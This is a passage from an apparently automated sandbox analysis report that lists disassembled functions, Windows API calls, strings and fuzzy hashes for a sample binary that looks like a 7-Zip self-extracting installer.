??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175

Strings

hAA, xrefs: 00404091, 0040409B, 004040A2, 004040B0

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@$CharUpper$lstrlen
String ID: hAA
API String ID: 2587799592-1362906312
Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658

Function 00404CBC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8

Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D

Strings

;!@InstallEnd@!, xrefs: 00404D73
;!@Install@!UTF-8!, xrefs: 00404D59
03A, xrefs: 00404CCF

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@$FileTime$AttributesSystemlstrlen
String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 4038993085-2279431206
Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98

Function 0040755F Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 00407579
KillTimer.USER32(?,00000001), ref: 0040758A
SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
SuspendThread.KERNEL32(0000028C), ref: 004075CD
ResumeThread.KERNEL32(0000028C), ref: 004075EA
EndDialog.USER32(?,00000000), ref: 0040760C

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: DialogThreadTimer$KillResumeSuspend
String ID:
API String ID: 4151135813-0
Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D

Function 00404E3F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85

Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6

??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
wsprintfA.USER32 ref: 00404EBC

Strings

;!@InstallEnd@!, xrefs: 00404E59
;!@Install@!UTF-8!, xrefs: 00404E4A
:Language:%u!, xrefs: 00404EB6

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@$wsprintf
String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 2704270482-1550708412
Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799

Function 00403880 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932

Strings

%%T\, xrefs: 004038A6
%%T/, xrefs: 004038E4

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@
String ID: %%T/$%%T\
API String ID: 613200358-2679640699
Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98

Function 0040393B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED

Strings

%%S/, xrefs: 0040399F
%%S\, xrefs: 00403961

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@
String ID: %%S/$%%S\
API String ID: 613200358-358529586
Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98

Function 004039F6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8

Strings

%%M/, xrefs: 00403A5A
%%M\, xrefs: 00403A1C

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@
String ID: %%M/$%%M\
API String ID: 613200358-4143866494
Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58

Function 0040E456 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE

Strings

DJA, xrefs: 0040E4A8
4JA, xrefs: 0040E4AF
$JA, xrefs: 0040E4B6
hJA, xrefs: 0040E49A
xJA, xrefs: 0040E493
TJA, xrefs: 0040E4A1

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ExceptionThrow
String ID: $JA$4JA$DJA$TJA$hJA$xJA
API String ID: 432778473-803145960
Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C

Function 0040C0DC Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 243COMMON

Download Yara Rule

APIs

Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B

??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D

Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00

??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245

Strings

IA, xrefs: 0040C11B
IA, xrefs: 0040C12D
IA, xrefs: 0040C0EC

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??2@$??3@$memmove
String ID: IA$IA$IA
API String ID: 4294387087-924693538
Opcode ID: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
Opcode Fuzzy Hash: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54

Function 0040E811 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898

Strings

IA, xrefs: 0040E818, 0040E841

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID: IA
API String ID: 3462485524-3293647318
Opcode ID: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
Opcode Fuzzy Hash: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794

Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00401029
wsprintfW.USER32 ref: 00401049
lstrcatW.KERNEL32(?,?), ref: 0040105C
ExitProcess.KERNEL32 ref: 00401084

Strings

0x%p, xrefs: 00401043

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: wsprintf$ExitProcesslstrcat
String ID: 0x%p
API String ID: 2530384128-1745605757
Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA

Function 00407A3A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9

GetSystemMetrics.USER32(00000007), ref: 00407A51
GetSystemMetrics.USER32(00000007), ref: 00407A62
??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29

Strings

100%% , xrefs: 00407A81, 00407A88, 00407AE1

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: MetricsSystem$??3@
String ID: 100%%
API String ID: 2562992111-568723177
Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99

Function 00407998 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00407A12

Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B

GetDlgItem.USER32(?,000004B3), ref: 004079C6

Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB

??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4

Strings

(%u%s), xrefs: 00407A0C

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: TextWindow$ItemLength$??3@wsprintf
String ID: (%u%s)
API String ID: 3595513934-2496177969
Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68

Function 004021ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
GetProcAddress.KERNEL32(00000000), ref: 00402211

Strings

kernel32, xrefs: 00402205
GetNativeSystemInfo, xrefs: 00402200

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32
API String ID: 2574300362-3846845290
Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE

Function 00402185 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
GetProcAddress.KERNEL32(00000000), ref: 0040219F

Strings

Wow64RevertWow64FsRedirection, xrefs: 0040218E
kernel32, xrefs: 00402193

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 2574300362-3900151262
Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C

Function 004021B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
GetProcAddress.KERNEL32(00000000), ref: 004021D1

Strings

